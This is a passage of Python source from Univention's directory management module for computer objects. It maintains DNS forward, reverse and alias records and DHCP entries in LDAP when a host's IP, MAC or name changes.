'we should remove a dns forward object: zoneDn=\"%s\", name=\"%s\", ip=\"%s\"' % (zoneDn, name, ip))\n if name:\n # check if dns forward object has more than one ip address\n if not ip:\n if zoneDn:\n 
self.lo.delete('relativeDomainName=%s,%s' % (escape_dn_chars(name), zoneDn))\n zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, zoneDn)\n zone.open()\n zone.modify()\n else:\n if zoneDn:\n base = zoneDn\n else:\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n base = tmppos.getBase()\n ud.debug(ud.ADMIN, ud.INFO, 'search base=\"%s\"' % base)\n if ':' in ip:\n ip = IPv6Address(u'%s' % (ip,)).exploded\n (attrEdit, attrOther) = ('aAAARecord', 'aRecord')\n else:\n (attrEdit, attrOther) = ('aRecord', 'aAAARecord')\n results = self.lo.search(base=base, scope='domain', attr=['aRecord', 'aAAARecord'], filter=filter_format('(&(relativeDomainName=%s)(%s=%s))', (name, attrEdit, ip)), unique=False, required=False)\n for dn, attr in results:\n if [x.decode('ASCII') for x in attr[attrEdit]] == [ip] and not attr.get(attrOther): # the to be removed is the last on the object\n # remove the object\n self.lo.delete(dn)\n else:\n # remove only the ip address attribute\n new_ip_list = copy.deepcopy(attr[attrEdit])\n new_ip_list.remove(ip.encode('ASCII'))\n\n self.lo.modify(dn, [(attrEdit, attr[attrEdit], new_ip_list)])\n\n zone = zoneDn or self.lo.parentDn(dn)\n zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, zone)\n zone.open()\n zone.modify()\n\n def __add_related_ptrrecords(self, zoneDN, ip): # type: (str, str) -> None\n if not all((zoneDN, ip)):\n return\n ptrrecord = '%s.%s.' 
% (self.info['name'], explode_rdn(zoneDN, True)[0])\n ip_split = ip.split('.')\n ip_split.reverse()\n search_filter = filter_format('(|(relativeDomainName=%s)(relativeDomainName=%s)(relativeDomainName=%s))', (ip_split[0], '.'.join(ip_split[:1]), '.'.join(ip_split[:2])))\n\n for dn, _attributes in self.lo.search(base=zoneDN, scope='domain', attr=['pTRRecord'], filter=search_filter):\n self.lo.modify(dn, [('pTRRecord', '', ptrrecord)])\n\n def __remove_related_ptrrecords(self, zoneDN, ip): # type: (str, str) -> None\n ptrrecord = '%s.%s.' % (self.info['name'], explode_rdn(zoneDN, True)[0])\n ip_split = ip.split('.')\n ip_split.reverse()\n search_filter = filter_format('(|(relativeDomainName=%s)(relativeDomainName=%s)(relativeDomainName=%s))', (ip_split[0], '.'.join(ip_split[:1]), '.'.join(ip_split[:2])))\n\n for dn, attributes in self.lo.search(base=zoneDN, scope='domain', attr=['pTRRecord'], filter=search_filter):\n if ptrrecord in attributes['pTRRecord']:\n self.lo.modify(dn, [('pTRRecord', ptrrecord, '')])\n\n def check_common_name_length(self): # type: () -> None\n ud.debug(ud.ADMIN, ud.INFO, 'check_common_name_length with self[\"ip\"] = %r and self[\"dnsEntryZoneForward\"] = %r' % (self['ip'], self['dnsEntryZoneForward']))\n if len(self['ip']) > 0 and len(self['dnsEntryZoneForward']) > 0:\n for zone in self['dnsEntryZoneForward']:\n if zone == '':\n continue\n zoneName = explode_rdn(zone[0], True)[0]\n if len(zoneName) + len(self['name']) >= 63:\n ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: length of Common Name is too long: %d' % (len(zoneName) + len(self['name']) + 1))\n raise univention.admin.uexceptions.commonNameTooLong()\n\n @staticmethod\n def _ip2dns(addr): # type: (str) -> Tuple[Union[IPv4Address, IPv6Address], str]\n \"\"\"\n Convert IP address string to 2-tuple (IPAddress, LdapAttributeName).\n\n :param addr: an IPv4 or IPv6 address.\n :returns: 2-tuple (IPAddress, LdapAttributeName)\n\n >>> simpleComputer._ip2dns('127.0.0.1')\n 
(IPv4Address(u'127.0.0.1'), 'aRecord')\n >>> simpleComputer._ip2dns('::1')\n (IPv6Address(u'::1'), 'aAAARecord')\n \"\"\"\n ip = ip_address(u'%s' % (addr, ))\n return (ip, 'aAAARecord' if isinstance(ip, IPv6Address) else 'aRecord')\n\n def __modify_dns_forward_object(self, name, zoneDn, new_ip, old_ip): # type: (str, str, str, str) -> None\n ud.debug(ud.ADMIN, ud.INFO, 'we should modify a dns forward object: zoneDn=\"%s\", name=\"%s\", new_ip=\"%s\", old_ip=\"%s\"' % (zoneDn, name, new_ip, old_ip))\n zone = None\n if old_ip and new_ip:\n if not zoneDn:\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n base = tmppos.getBase()\n else:\n base = zoneDn\n\n naddr, nattr = self._ip2dns(new_ip)\n oaddr, oattr = self._ip2dns(old_ip)\n results = self.lo.search(base=base, scope='domain', attr=['aRecord', 'aAAARecord'], filter=filter_format('(&(relativeDomainName=%s)(%s=%s))', (name, oattr, old_ip)), unique=False)\n\n for dn, attr in results:\n old_aRecord = attr.get('aRecord', [])\n new_aRecord = copy.deepcopy(old_aRecord)\n old_aAAARecord = attr.get('aAAARecord', [])\n new_aAAARecord = copy.deepcopy(old_aAAARecord)\n\n if isinstance(oaddr, IPv6Address):\n new_aAAARecord.remove(old_ip.encode('ASCII'))\n else:\n new_aRecord.remove(old_ip.encode('ASCII'))\n\n new_ip = naddr.exploded.encode('ASCII')\n if isinstance(naddr, IPv6Address):\n if new_ip not in new_aAAARecord:\n new_aAAARecord.append(new_ip)\n else:\n if new_ip not in new_aRecord:\n new_aRecord.append(new_ip)\n\n modlist = []\n if old_aAAARecord != new_aAAARecord:\n modlist.append(('aAAARecord', old_aAAARecord, new_aAAARecord))\n if old_aRecord != new_aRecord:\n modlist.append(('aRecord', old_aRecord, new_aRecord))\n self.lo.modify(dn, modlist)\n if not zoneDn:\n zone = self.lo.parentDn(dn)\n\n if zoneDn:\n zone = zoneDn\n\n if zone:\n ud.debug(ud.ADMIN, ud.INFO, 'update the zon sOARecord for the zone: %s' % zone)\n\n zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, 
def __add_dns_forward_object(self, name, zoneDn, ip):  # type: (str, str, str) -> None
    """Dispatch creation of a forward DNS record for `name` in `zoneDn`
    to the IPv4 or IPv6 specific helper, depending on the address family
    of `ip`. A missing name, ip or zoneDn makes this a no-op."""
    ud.debug(ud.ADMIN, ud.INFO, 'we should add a dns forward object: zoneDn="%s", name="%s", ip="%s"' % (zoneDn, name, ip))
    if not all((name, ip, zoneDn)):
        return
    addr = ip_address(u'%s' % (ip,))
    if isinstance(addr, IPv6Address):
        self.__add_dns_forward_object_ipv6(name, zoneDn, addr)
    elif isinstance(addr, IPv4Address):
        self.__add_dns_forward_object_ipv4(name, zoneDn, addr)

def __add_dns_forward_object_ipv6(self, name, zoneDn, addr):  # type: (str, str, IPv6Address) -> None
    """Create or extend the dNSZone host record for `name` in `zoneDn`
    with the IPv6 address `addr` (stored as aAAARecord).

    :raises univention.admin.uexceptions.dnsAliasRecordExists: if the add
        collides with an existing entry of the same RDN.
    """
    ip = addr.exploded.encode('ASCII')
    # look for an existing host record; CNAME entries are explicitly excluded
    results = self.lo.search(base=zoneDn, scope='domain', attr=['aAAARecord'], filter=filter_format('(&(relativeDomainName=%s)(!(cNAMERecord=*)))', (name,)), unique=False)
    if not results:
        try:
            self.lo.add('relativeDomainName=%s,%s' % (escape_dn_chars(name), zoneDn), [
                ('objectClass', [b'top', b'dNSZone', b'univentionObject']),
                ('univentionObjectType', [b'dns/host_record']),
                ('zoneName', explode_rdn(zoneDn, True)[0].encode('UTF-8')),
                ('aAAARecord', [ip]),
                ('relativeDomainName', [name.encode('UTF-8')]),
            ])
        except univention.admin.uexceptions.objectExists as ex:
            # an object with this RDN already exists -> report as alias clash
            raise univention.admin.uexceptions.dnsAliasRecordExists(ex.dn)
        # TODO: check if zoneDn really a forwardZone, maybe it is a container under a zone
        # open+modify bumps the zone's SOA serial so the change propagates
        zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, zoneDn)
        zone.open()
        zone.modify()
    else:
        for dn, attr in results:
            if 'aAAARecord' in attr:
                # append the new address unless it is already present
                new_ip_list = copy.deepcopy(attr['aAAARecord'])
                if ip not in new_ip_list:
                    new_ip_list.append(ip)
                    self.lo.modify(dn, [('aAAARecord', attr['aAAARecord'], new_ip_list)])
            else:
                # record exists but has no IPv6 address yet
                self.lo.modify(dn, [('aAAARecord', b'', ip)])
def __add_dns_forward_object_ipv4(self, name, zoneDn, addr):  # type: (str, str, IPv4Address) -> None
    """Create or extend the dNSZone host record for `name` in `zoneDn`
    with the IPv4 address `addr` (stored as aRecord).

    :raises univention.admin.uexceptions.dnsAliasRecordExists: if the add
        collides with an existing entry of the same RDN.
    """
    ip = addr.exploded.encode('ASCII')
    # look for an existing host record; CNAME entries are explicitly excluded
    results = self.lo.search(base=zoneDn, scope='domain', attr=['aRecord'], filter=filter_format('(&(relativeDomainName=%s)(!(cNAMERecord=*)))', (name,)), unique=False)
    if not results:
        try:
            self.lo.add('relativeDomainName=%s,%s' % (escape_dn_chars(name), zoneDn), [
                ('objectClass', [b'top', b'dNSZone', b'univentionObject']),
                ('univentionObjectType', [b'dns/host_record']),
                ('zoneName', explode_rdn(zoneDn, True)[0].encode('UTF-8')),
                # CONSISTENCY FIX: was 'ARecord'; every other reference in
                # this module (searches, modifies, the IPv6 twin) uses the
                # canonical spelling 'aRecord'. LDAP attribute names are
                # case-insensitive, so behaviour is unchanged.
                ('aRecord', [ip]),
                ('relativeDomainName', [name.encode('UTF-8')]),
            ])
        except univention.admin.uexceptions.objectExists as ex:
            # an object with this RDN already exists -> report as alias clash
            raise univention.admin.uexceptions.dnsAliasRecordExists(ex.dn)
        # TODO: check if zoneDn really a forwardZone, maybe it is a container under a zone
        # open+modify bumps the zone's SOA serial so the change propagates
        zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, zoneDn)
        zone.open()
        zone.modify()
    else:
        for dn, attr in results:
            if 'aRecord' in attr:
                # append the new address unless it is already present
                new_ip_list = copy.deepcopy(attr['aRecord'])
                if ip not in new_ip_list:
                    new_ip_list.append(ip)
                    self.lo.modify(dn, [('aRecord', attr['aRecord'], new_ip_list)])
            else:
                # record exists but has no IPv4 address yet
                self.lo.modify(dn, [('aRecord', b'', ip)])
def __add_dns_alias_object(self, name, dnsForwardZone, dnsAliasZoneContainer, alias):  # type: (str, str, str, str) -> None
    """Create a CNAME (dns/alias) entry `alias` -> `name`.`dnsForwardZone`.
    inside `dnsAliasZoneContainer`. All four arguments must be non-empty,
    otherwise nothing happens.

    :raises univention.admin.uexceptions.dnsAliasAlreadyUsed: if an entry
        with that relativeDomainName already exists (cNAMERecord is
        single-valued, so the alias cannot point at two targets).
    """
    ud.debug(ud.ADMIN, ud.INFO, 'add a dns alias object: name="%s", dnsForwardZone="%s", dnsAliasZoneContainer="%s", alias="%s"' % (name, dnsForwardZone, dnsAliasZoneContainer, alias))
    # normalize: strip a trailing dot from the alias label
    alias = alias.rstrip('.')
    if name and dnsForwardZone and dnsAliasZoneContainer and alias:
        results = self.lo.search(base=dnsAliasZoneContainer, scope='domain', attr=['cNAMERecord'], filter=filter_format('relativeDomainName=%s', (alias,)), unique=False)
        if not results:
            self.lo.add('relativeDomainName=%s,%s' % (escape_dn_chars(alias), dnsAliasZoneContainer), [
                ('objectClass', [b'top', b'dNSZone', b'univentionObject']),
                ('univentionObjectType', [b'dns/alias']),
                ('zoneName', explode_rdn(dnsAliasZoneContainer, True)[0].encode('UTF-8')),
                # target is the absolute FQDN, hence the trailing dot
                ('cNAMERecord', [b"%s.%s." % (name.encode('UTF-8'), dnsForwardZone.encode('UTF-8'))]),
                ('relativeDomainName', [alias.encode('UTF-8')]),
            ])

            # TODO: check if dnsAliasZoneContainer really is a forwardZone, maybe it is a container under a zone
            # open+modify bumps the zone's SOA serial so the change propagates
            zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, dnsAliasZoneContainer)
            zone.open()
            zone.modify()
        else:
            # throw exception, cNAMERecord is single value
            raise univention.admin.uexceptions.dnsAliasAlreadyUsed(_('DNS alias is already in use.'))
def __remove_dns_alias_object(self, name, dnsForwardZone, dnsAliasZoneContainer, alias=None):  # type: (str, str, str, str) -> None
    """Remove CNAME (dns/alias) entries pointing at `name` in
    `dnsForwardZone`.

    If `alias` is given, only that alias is removed (directly by DN when
    `dnsAliasZoneContainer` is known, otherwise by a domain-wide search).
    Without `alias`, every CNAME referring to this host is removed. After
    each deletion the affected zone's SOA serial is bumped via
    open()/modify().
    """
    ud.debug(ud.ADMIN, ud.INFO, 'remove a dns alias object: name="%s", dnsForwardZone="%s", dnsAliasZoneContainer="%s", alias="%s"' % (name, dnsForwardZone, dnsAliasZoneContainer, alias))
    if name:
        if alias:
            if dnsAliasZoneContainer:
                # container known: delete the entry directly by DN
                self.lo.delete('relativeDomainName=%s,%s' % (escape_dn_chars(alias), dnsAliasZoneContainer))
                zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, dnsAliasZoneContainer)
                zone.open()
                zone.modify()
            elif dnsForwardZone:
                # container unknown: search the whole domain for the alias
                tmppos = univention.admin.uldap.position(self.position.getDomain())
                base = tmppos.getBase()
                ud.debug(ud.ADMIN, ud.INFO, 'search base="%s"' % base)
                results = self.lo.search(base=base, scope='domain', attr=['zoneName'], filter=filter_format('(&(objectClass=dNSZone)(relativeDomainName=%s)(cNAMERecord=%s.%s.))', (alias, name, dnsForwardZone)), unique=False, required=False)
                for dn, attr in results:
                    # remove the object
                    self.lo.delete(dn)
                    # and update the SOA version number for the zone
                    results = self.lo.searchDn(base=tmppos.getBase(), scope='domain', filter=filter_format('(&(objectClass=dNSZone)(zoneName=%s)(relativeDomainName=@))', (attr['zoneName'][0].decode('UTF-8'),)), unique=False)
                    for zoneDn in results:
                        zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, zoneDn)
                        zone.open()
                        zone.modify()
        else:
            if dnsForwardZone:
                tmppos = univention.admin.uldap.position(self.position.getDomain())
                base = tmppos.getBase()
                ud.debug(ud.ADMIN, ud.INFO, 'search base="%s"' % base)
                # BUGFIX: the filter used to be
                #   '(&(objectClass=dNSZone)(&(cNAMERecord=%s)(cNAMERecord=%s.%s.))'
                # which (a) is missing a closing parenthesis and therefore is
                # not a valid RFC 4515 filter, and (b) ANDs two different
                # values of the single-valued cNAMERecord attribute, which can
                # never match. Either the short or the fully-qualified target
                # form must match, so use OR with balanced parentheses.
                results = self.lo.search(base=base, scope='domain', attr=['zoneName'], filter=filter_format('(&(objectClass=dNSZone)(|(cNAMERecord=%s)(cNAMERecord=%s.%s.)))', (name, name, dnsForwardZone)), unique=False, required=False)
                for dn, attr in results:
                    # remove the object
                    self.lo.delete(dn)
                    # and update the SOA version number for the zone
                    results = self.lo.searchDn(base=tmppos.getBase(), scope='domain', filter=filter_format('(&(objectClass=dNSZone)(zoneName=%s)(relativeDomainName=@))', (attr['zoneName'][0].decode('UTF-8'),)), unique=False)
                    for zoneDn in results:
                        zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, zoneDn)
                        zone.open()
                        zone.modify()
            else:  # not enough info to remove alias entries
                pass
def _ldap_post_modify(self):
    # type: () -> None
    """Post-modify hook: propagate the change sets queued in
    self.__changes (built by _ldap_modlist) to the related DHCP entries,
    forward/reverse DNS records and alias records, then update group
    memberships. Order matters: removals are processed before additions
    for each category."""
    super(simpleComputer, self)._ldap_post_modify()

    # once more than one MAC or IP is configured the single-address
    # shortcuts below must stay disabled for good
    self.__multiip |= len(self['mac']) > 1 or len(self['ip']) > 1

    for entry in self.__changes['dhcpEntryZone']['remove']:
        ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: dhcp check: removed: %s' % (entry,))
        dn, ip, mac = self.__split_dhcp_line(entry)
        if not ip and not mac and not self.__multiip:
            # incomplete entry in a single-address setup: fall back to the first MAC
            mac = ''
            if self['mac']:
                mac = self['mac'][0]
            self.__remove_from_dhcp_object(mac=mac)
        else:
            self.__remove_from_dhcp_object(ip=ip, mac=mac)

    for entry in self.__changes['dhcpEntryZone']['add']:
        ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: dhcp check: added: %s' % (entry,))
        dn, ip, mac = self.__split_dhcp_line(entry)
        if not ip and not mac and not self.__multiip:
            # fill in the missing address parts from the computer itself
            ip, mac = ('', '')
            if self['ip']:
                ip = self['ip'][0]
            if self['mac']:
                mac = self['mac'][0]
        self.__modify_dhcp_object(dn, mac, ip=ip)

    for entry in self.__changes['dnsEntryZoneForward']['remove']:
        dn, ip = self.__split_dns_line(entry)
        if not ip and not self.__multiip:
            # no explicit IP stored in the entry: use the host's single IP
            ip = ''
            if self['ip']:
                ip = self['ip'][0]
            self.__remove_dns_forward_object(self['name'], dn, ip)
            self.__remove_related_ptrrecords(dn, ip)
        else:
            self.__remove_dns_forward_object(self['name'], dn, ip)
            self.__remove_related_ptrrecords(dn, ip)

    for entry in self.__changes['dnsEntryZoneForward']['add']:
        ud.debug(ud.ADMIN, ud.INFO, 'we should add a dns forward object "%s"' % (entry,))
        dn, ip = self.__split_dns_line(entry)
        ud.debug(ud.ADMIN, ud.INFO, 'changed the object to dn="%s" and ip="%s"' % (dn, ip))
        if not ip and not self.__multiip:
            ud.debug(ud.ADMIN, ud.INFO, 'no multiip environment')
            ip = ''
            if self['ip']:
                ip = self['ip'][0]
            self.__add_dns_forward_object(self['name'], dn, ip)
            self.__add_related_ptrrecords(dn, ip)
        else:
            self.__add_dns_forward_object(self['name'], dn, ip)
            self.__add_related_ptrrecords(dn, ip)

    for entry in self.__changes['dnsEntryZoneReverse']['remove']:
        dn, ip = self.__split_dns_line(entry)
        if not ip and not self.__multiip:
            ip = ''
            if self['ip']:
                ip = self['ip'][0]
            self.__remove_dns_reverse_object(self['name'], dn, ip)
        else:
            self.__remove_dns_reverse_object(self['name'], dn, ip)

    for entry in self.__changes['dnsEntryZoneReverse']['add']:
        dn, ip = self.__split_dns_line(entry)
        if not ip and not self.__multiip:
            ip = ''
            if self['ip']:
                ip = self['ip'][0]
            self.__add_dns_reverse_object(self['name'], dn, ip)
        else:
            self.__add_dns_reverse_object(self['name'], dn, ip)

    for entry in self.__changes['dnsEntryZoneAlias']['remove']:
        dnsForwardZone, dnsAliasZoneContainer, alias = entry
        if not alias:
            # nonfunctional code since self[ 'alias' ] should be self[ 'dnsAlias' ], but this case does not seem to occur
            self.__remove_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, self['alias'][0])
        else:
            self.__remove_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, alias)

    for entry in self.__changes['dnsEntryZoneAlias']['add']:
        ud.debug(ud.ADMIN, ud.INFO, 'we should add a dns alias object "%s"' % (entry,))
        dnsForwardZone, dnsAliasZoneContainer, alias = entry
        ud.debug(ud.ADMIN, ud.INFO, 'changed the object to dnsForwardZone [%s], dnsAliasZoneContainer [%s] and alias [%s]' % (dnsForwardZone, dnsAliasZoneContainer, alias))
        if not alias:
            self.__add_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, self['alias'][0])
        else:
            self.__add_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, alias)

    for entry in self.__changes['mac']['remove']:
        self.__remove_from_dhcp_object(mac=entry)

    changed_ip = False
    for entry in self.__changes['ip']['remove']:
        # self.__remove_from_dhcp_object(ip=entry)
        if not self.__multiip:
            if len(self.__changes['ip']['add']) > 0:
                # we change: a single IP was swapped for another one, so
                # rewrite DNS and DHCP in place instead of remove+add
                single_ip = self.__changes['ip']['add'][0]
                self.__modify_dns_forward_object(self['name'], None, single_ip, entry)
                changed_ip = True
                for mac in self['mac']:
                    dn = self.__remove_from_dhcp_object(ip=entry, mac=mac)
                    try:
                        dn = self.lo.parentDn(dn)
                        self.__modify_dhcp_object(dn, mac, ip=single_ip)
                    except Exception:
                        # best effort: the DHCP entry may already be gone
                        pass
            else:
                # remove the dns objects
                self.__remove_dns_forward_object(self['name'], None, entry)
        else:
            self.__remove_dns_forward_object(self['name'], None, entry)
            self.__remove_from_dhcp_object(ip=entry)

        self.__remove_dns_reverse_object(self['name'], None, entry)

    for entry in self.__changes['ip']['add']:
        if not self.__multiip:
            if self.get('dnsEntryZoneForward', []) and not changed_ip:
                self.__add_dns_forward_object(self['name'], self['dnsEntryZoneForward'][0][0], entry)
            for dnsEntryZoneReverse in self.get('dnsEntryZoneReverse', []):
                x, ip = self.__split_dns_line(dnsEntryZoneReverse)
                # only add the reverse record to a zone of the matching family
                zoneIsV6 = explode_rdn(x, True)[0].endswith('.ip6.arpa')
                entryIsV6 = ':' in entry
                if zoneIsV6 == entryIsV6:
                    self.__add_dns_reverse_object(self['name'], x, entry)

    if self.__changes['name']:
        # host was renamed: propagate to groups, DHCP and DNS entries
        ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: name has changed')
        self.__update_groups_after_namechange()
        self.__rename_dhcp_object(old_name=self.__changes['name'][0], new_name=self.__changes['name'][1])
        self.__rename_dns_object(position=None, old_name=self.__changes['name'][0], new_name=self.__changes['name'][1])

    self.update_groups()
def __remove_associated_domain(self, entry):
    """Clear self.info['domain'] when it matches the zone of *entry*."""
    zone_dn, _ip = self.__split_dns_line(entry)
    zone_name = explode_rdn(zone_dn, 1)[0]
    if zone_name == self.info.get('domain', None):
        self.info['domain'] = None

def __set_associated_domain(self, entry):
    """Adopt the zone of *entry* as self.info['domain'] unless one is set."""
    zone_dn, _ip = self.__split_dns_line(entry)
    zone_name = explode_rdn(zone_dn, 1)[0]
    if not self.info.get('domain', None):
        self.info['domain'] = zone_name
def _ldap_modlist(self):
    """Build the LDAP modification list for this computer and record the
    per-category change sets in self.__changes for the post hooks
    (_ldap_post_create / _ldap_post_modify) to act on.

    :returns: list of (attribute, old, new) modification 3-tuples.
    :raises univention.admin.uexceptions.macAlreadyUsed: MAC lock failed.
    :raises univention.admin.uexceptions.ipAlreadyUsed: IP lock failed.
    :raises univention.admin.uexceptions.invalidDhcpEntry: malformed DHCP entry.
    :raises univention.admin.uexceptions.invalidDNSAliasEntry: malformed alias entry.
    """
    self.__changes = {
        'mac': {'remove': [], 'add': []},
        'ip': {'remove': [], 'add': []},
        'name': None,
        'dnsEntryZoneForward': {'remove': [], 'add': []},
        'dnsEntryZoneReverse': {'remove': [], 'add': []},
        'dnsEntryZoneAlias': {'remove': [], 'add': []},
        'dhcpEntryZone': {'remove': [], 'add': []},
    }
    ml = []
    if self.hasChanged('mac'):
        for macAddress in self.info.get('mac', []):
            if macAddress in self.oldinfo.get('mac', []):
                continue
            try:
                # lock the new MAC; request_lock may normalize the value
                self.__changes['mac']['add'].append(self.request_lock('mac', macAddress))
            except univention.admin.uexceptions.noLock:
                raise univention.admin.uexceptions.macAlreadyUsed(macAddress)
        for macAddress in self.oldinfo.get('mac', []):
            if macAddress in self.info.get('mac', []):
                continue
            self.__changes['mac']['remove'].append(macAddress)

    oldAddresses = self.oldinfo.get('ip') or ()
    newAddresses = self.info.get('ip') or ()
    if oldAddresses != newAddresses:
        # split the address lists by family: IPv4 -> aRecord, IPv6 -> aAAARecord
        old_addr = [ip_address(u'%s' % addr) for addr in oldAddresses]
        old_ipv4 = [addr.exploded.encode('ASCII') for addr in old_addr if isinstance(addr, IPv4Address)]
        old_ipv6 = [addr.exploded.encode('ASCII') for addr in old_addr if isinstance(addr, IPv6Address)]
        new_addr = [ip_address(u'%s' % addr) for addr in newAddresses]
        new_ipv4 = [addr.exploded.encode('ASCII') for addr in new_addr if isinstance(addr, IPv4Address)]
        new_ipv6 = [addr.exploded.encode('ASCII') for addr in new_addr if isinstance(addr, IPv6Address)]
        ml.append(('aRecord', old_ipv4, new_ipv4))
        ml.append(('aAAARecord', old_ipv6, new_ipv6))

    if self.hasChanged('ip'):
        for ipAddress in self['ip']:
            if not ipAddress:
                continue
            if ipAddress in self.oldinfo.get('ip'):
                continue
            if not self.ip_alredy_requested:
                try:
                    ipAddress = self.request_lock('aRecord', ipAddress)
                except univention.admin.uexceptions.noLock:
                    self.ip_alredy_requested = 0
                    raise univention.admin.uexceptions.ipAlreadyUsed(ipAddress)

            self.__changes['ip']['add'].append(ipAddress)

        for ipAddress in self.oldinfo.get('ip', []):
            if ipAddress in self.info['ip']:
                continue
            self.__changes['ip']['remove'].append(ipAddress)

    if self.hasChanged('name'):
        ml.append(('sn', self.oldattr.get('sn', [None])[0], self['name'].encode('UTF-8')))
        # remember (old, new) for the rename handling in the post hook
        self.__changes['name'] = (self.oldattr.get('sn', [b''])[0].decode("UTF-8") or None, self['name'])

    if self.hasChanged('ip') or self.hasChanged('mac'):
        dhcp = [self.__split_dhcp_line(entry) for entry in self.info.get('dhcpEntryZone', [])]
        if len(newAddresses) <= 1 and len(self.info.get('mac', [])) == 1 and dhcp:
            # In this special case, we assume the mapping between ip/mac address to be
            # unique. The dhcp entry needs to contain the mac address (as specified by
            # the ldap search for dhcp entries), the ip address may not correspond to
            # the ip address associated with the computer ldap object, but this would
            # be erroneous anyway. We therefore update the dhcp entry to correspond to
            # the current ip and mac address. (Bug #20315)
            self.info['dhcpEntryZone'] = [
                (dn, newAddresses[0] if newAddresses else '', self.info['mac'][0])
                for (dn, ip, _mac) in dhcp
            ]
        else:
            # in all other cases, we remove old dhcp entries that do not match ip or
            # mac addresses (Bug #18966)
            removedIPs = set(self.oldinfo.get('ip', [])) - set(self['ip'])
            removedMACs = set(self.oldinfo.get('mac', [])) - set(self['mac'])
            self.info['dhcpEntryZone'] = [
                (dn, ip, _mac)
                for (dn, ip, _mac) in dhcp
                if not (ip in removedIPs or _mac in removedMACs)
            ]

    if self.hasChanged('dhcpEntryZone'):
        if 'dhcpEntryZone' in self.oldinfo:
            if 'dhcpEntryZone' in self.info:
                for entry in self.oldinfo['dhcpEntryZone']:
                    if entry not in self.info['dhcpEntryZone']:
                        self.__changes['dhcpEntryZone']['remove'].append(entry)
            else:
                # property was cleared entirely: remove every old entry
                for entry in self.oldinfo['dhcpEntryZone']:
                    self.__changes['dhcpEntryZone']['remove'].append(entry)
        if 'dhcpEntryZone' in self.info:
            for entry in self.info['dhcpEntryZone']:
                # check if line is valid
                dn, ip, mac = self.__split_dhcp_line(entry)
                if dn and mac:
                    if entry not in self.oldinfo.get('dhcpEntryZone', []):
                        self.__changes['dhcpEntryZone']['add'].append(entry)
                else:
                    raise univention.admin.uexceptions.invalidDhcpEntry(_('The DHCP entry for this host should contain the zone LDAP-DN, the IP address and the MAC address.'))

    if self.hasChanged('dnsEntryZoneForward'):
        for entry in self.oldinfo.get('dnsEntryZoneForward', []):
            if entry not in self.info.get('dnsEntryZoneForward', []):
                self.__changes['dnsEntryZoneForward']['remove'].append(entry)
                self.__remove_associated_domain(entry)
        for entry in self.info.get('dnsEntryZoneForward', []):
            if entry == '':
                continue
            if entry not in self.oldinfo.get('dnsEntryZoneForward', []):
                self.__changes['dnsEntryZoneForward']['add'].append(entry)
            self.__set_associated_domain(entry)

    if self.hasChanged('dnsEntryZoneReverse'):
        for entry in self.oldinfo.get('dnsEntryZoneReverse', []):
            if entry not in self.info.get('dnsEntryZoneReverse', []):
                self.__changes['dnsEntryZoneReverse']['remove'].append(entry)
        for entry in self.info.get('dnsEntryZoneReverse', []):
            if entry not in self.oldinfo.get('dnsEntryZoneReverse', []):
                self.__changes['dnsEntryZoneReverse']['add'].append(entry)

    if self.hasChanged('dnsEntryZoneAlias'):
        for entry in self.oldinfo.get('dnsEntryZoneAlias', []):
            if entry not in self.info.get('dnsEntryZoneAlias', []):
                self.__changes['dnsEntryZoneAlias']['remove'].append(entry)
        for entry in self.info.get('dnsEntryZoneAlias', []):
            # check if line is valid
            dnsForwardZone, dnsAliasZoneContainer, alias = entry
            if dnsForwardZone and dnsAliasZoneContainer and alias:
                if entry not in self.oldinfo.get('dnsEntryZoneAlias', []):
                    self.__changes['dnsEntryZoneAlias']['add'].append(entry)
            else:
                raise univention.admin.uexceptions.invalidDNSAliasEntry(_('The DNS alias entry for this host should contain the zone name, the alias zone container LDAP-DN and the alias.'))

    self.__multiip = len(self['mac']) > 1 or len(self['ip']) > 1

    ml += super(simpleComputer, self)._ldap_modlist()

    return ml
@classmethod
def calc_dns_reverse_entry_name(cls, sip, reverseDN):  # type: (Text, Text) -> Text
    """
    Computes the reverse record name of an IP address relative to a
    reverse zone.

    >>> simpleComputer.calc_dns_reverse_entry_name('10.200.2.5', 'subnet=2.200.10.in-addr.arpa')
    u'5'
    >>> simpleComputer.calc_dns_reverse_entry_name('10.200.2.5', 'subnet=200.10.in-addr.arpa')
    u'5.2'
    >>> simpleComputer.calc_dns_reverse_entry_name('2001:db8::3', 'subnet=0.0.0.0.0.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa')
    u'3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0'
    >>> simpleComputer.calc_dns_reverse_entry_name('1.2.3.4', 'subnet=2.in-addr.arpa')
    Traceback (most recent call last):
    ...
    ValueError: 4.3.2.1.in-addr.arpa not in .2.in-addr.arpa
    """
    parsed = ip_address(u'%s' % (sip,))
    pointer = parsed.reverse_pointer
    zone_suffix = u".%s" % (explode_rdn(reverseDN, True)[0],)
    if not pointer.endswith(zone_suffix):
        raise ValueError("%s not in %s" % (pointer, zone_suffix))
    # strip the zone suffix, keeping only the relative label part
    return pointer[:-len(zone_suffix)]

def _ldap_pre_create(self):
    """Pre-create hook: additionally enforce the common-name length limit."""
    super(simpleComputer, self)._ldap_pre_create()
    self.check_common_name_length()

def _ldap_pre_modify(self):
    """Pre-modify hook: additionally enforce the common-name length limit."""
    super(simpleComputer, self)._ldap_pre_modify()
    self.check_common_name_length()
def _ldap_post_create(self):
    """Post-create hook: apply the change sets collected by _ldap_modlist
    (DHCP entries, forward/reverse DNS records, alias records) for a
